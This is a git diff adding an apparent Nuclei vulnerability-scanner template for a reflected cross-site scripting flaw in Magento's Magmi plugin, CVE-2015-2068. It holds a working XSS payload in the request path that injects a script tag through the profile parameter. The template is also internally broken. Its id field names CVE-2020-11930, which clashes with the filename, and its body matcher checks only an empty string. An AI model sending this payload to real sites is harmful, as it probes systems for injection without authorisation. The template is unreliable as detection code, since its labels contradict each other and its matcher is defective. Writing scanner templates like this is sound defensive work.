diff --git a/cves/2015/CVE-2015-2068.yaml b/cves/2015/CVE-2015-2068.yaml new file mode 100644 index 0000000000..750fb72099 --- /dev/null +++ b/cves/2015/CVE-2015-2068.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-11930 + +info: + name: Magento Server Magmi Plugin - Cross Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php. + reference: + - https://www.exploit-db.com/exploits/35996 + - https://nvd.nist.gov/vuln/detail/CVE-2015-2068 + tags: cve,cve2015,magento,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200